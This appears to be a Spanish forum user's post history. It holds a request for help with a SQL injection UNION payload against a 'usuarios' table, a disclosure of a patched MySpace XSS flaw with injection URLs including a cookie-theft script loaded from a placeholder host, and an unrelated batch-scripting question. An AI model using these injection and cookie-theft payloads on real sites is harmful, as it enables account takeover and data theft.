Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Girl!

#1
HOla
alguien con más experiencia q me ayude un pokito que mhe quedado atrancada
en una base de datos mysqld-4.0.18-nt

POr inyecciones he sacado una tabla usuarios y dos columnas id y usuario.
yla inyección se encuentra tras un ?id=15
Aquí hago un UNION y le meto esto : SELECT usuario FROM usuarios where id=1/*
en total ?id=15 UNION SELECT usuario FROM usuarios where id=1/*
Me lanza el error The used SELECT statements have a different number of columns.
Es decir que me faltan columnas los relleno con NULL pero eso no me resuelve el problema, ¿está el eror al unir con el uNION y usar una columna de diferente tipo?.

Algun posible camino para continuar gracias.


#2
Nivel Web / Xss in Myspace Robo de Cookies
12 Marzo 2007, 18:57 PM
Ha sido corregida

XSS in MySpace Robo de cookie. Descubierto y reportado por rMrGvG

Cuando queremos acceder a myspace a una direccion que no es la de inicio myspace.com(ejemplo http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox&Mytoken=1 ) , este nos guarda la dirección completa en la cookie en los valores nextpage en la clave login de la misma ( fuseaction=login&nextPage=fuseaction=mail.inbox&mytoken=1) para redireccionarnos una vez logueados,a la variable mytoken podemos inyectarle código cerrandola mediante "> %22%3E también podemos inyectar en la variale friendID y asegurar la variable MyToken a 1de esta manera se ejecutaba el código tras loguearnos, pudiendo robar la cookie.

Aunque la inyección ya haya sido parcheada y nos hayan dejado publicarla, aun se puede demostrar la misma del siguiente modo, actualmente myspace pasa las variables a "> &quot;&gt; o nos da errores al usar < %3C sin embargo si nos logueamos erroneamente en myspace no se aplica la seguridad codificando los caracteres y vemos la inyección ahora mucho menos peligrosa, y que antes podía ser utilizada para robar cuentas de usuarios.

Ejemplo demostración de la inyeccion (debemos introducir una clave erronea para q nos muestre el código inyectado):
http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox&Mytoken=">rMrGvG

Imagen inyección

XSS:
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID="><script>alert('rMrGvG')</script>&MyToken=1
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID="><iframe src=http://sni-labs.com></iframe>&MyToken=1

ROBO de cookies
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID=<script src="http://url/script.js"></script>&MyToken=1

Fuente http://sni-labs.com
#3
Scripting / BAtch DUdas generales
3 Marzo 2005, 08:31 AM
Buenas, hace tiempo hice un batch para una tonteria del registro , y lo vi tan fácil y poderoso q me piqué , y claro empecé a complicar los bats y eso.... joder todo iba bien
todo está en ms2, jjaja pero no todo era gloria , lo primero q te das cuenta es q no es lo mismo hacerlos en w98/95 qu en xp , nt, me , 2K , ya que unos tienen comandos q faltan en otros y claro eso te descuadra, a parte si haces un bat pa 98 date cuenta q si usas un comando q no ta en xp pos no ira , :(
otro problema es al pasarlos a exe o com , en com no suelen dar problemas,pero a exe ya sea usando el  bat2exe o batchexe creas exes q al final no pueden ser usados directamente debes crearles accesos y otras cosas , vaya los bat simlpes de call *.exe o  los bat de una linea y un comando son simples y suelen poder pasarse a exes facil no dan problemas, bueno no m enrrollo más .. Todo esto era porque si alguien pudiera decirme de un compilador de batch o formas de introducir viejos o nuevos comandos en la version de ms2 q uses, aclarar q esto ultimo lo lei en inglés pero no llegue a enterarme y alfinal no sabia si hablaban de eso o de otra cosa, EA pos muchas gracias , habre dicho barbaridades y retonterias ,q quieren soy novata, ah y no vale eso de compila en c/c++ (se supone que ya se)
cuidense... y respondan porfavor